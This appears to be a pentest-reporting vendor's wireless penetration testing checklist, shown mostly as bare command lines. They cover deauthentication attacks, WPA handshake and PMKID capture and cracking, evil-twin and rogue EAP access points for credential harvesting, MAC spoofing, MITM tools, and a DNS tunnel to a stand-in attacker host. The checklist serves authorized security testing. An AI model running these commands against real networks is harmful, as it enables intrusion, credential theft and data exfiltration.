Vulnsy
Infrastructure27 items

Wireless Network Pentest Checklist

A wireless network security testing checklist covering Wi-Fi infrastructure, authentication mechanisms, encryption protocols, rogue device detection, and client-side attacks. Applicable to enterprise, guest, and IoT wireless networks.

NIST SP 800-153NIST SP 800-115PCI DSS 11.1CIS Controls
Progress: 0 of 27 items
0%
Commands
airmon-ng start wlan0
airodump-ng wlan0mon
Commands
airodump-ng wlan0mon --essid-regex ".*"
Commands
airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6
Commands
airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt
Evidence to capture

PCAP of the captured EAPOL four-way handshake plus the hashcat session output showing the cracked PSK.

Commands
hostapd-mana hostapd-mana.conf
eaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --creds
Evidence to capture

eaphammer or hostapd-mana log showing a captured MSCHAPv2 challenge/response, plus the cracked plaintext credentials from asleap or hashcat.

Commands
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
Commands
macchanger -m AA:BB:CC:DD:EE:FF wlan0
iodine -P password tunnel.attacker.com
Commands
eaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --creds --cert-wizard
Commands
airbase-ng -e CorpWiFi -c 6 wlan0mon
eaphammer -i wlan0 --essid CorpWiFi --auth wpa-eap --creds
Evidence to capture

screenshot of the evil-twin SSID broadcast, captured connection from a target client, and the harvested credentials or session cookies.

Commands
nmap -sS -Pn <internal_target_range>
Commands
bettercap -iface wlan0
mitm6 -d corp.local
Commands
arp-scan --interface=wlan0 --localnet

Industries Using This Checklist

Report Vulnerabilities Faster with Vulnsy

Stop rewriting the same findings. Use Vulnsy's reusable templates, collaborative workflows, and professional report generation to deliver pentest reports 10x faster.

Start Free Trial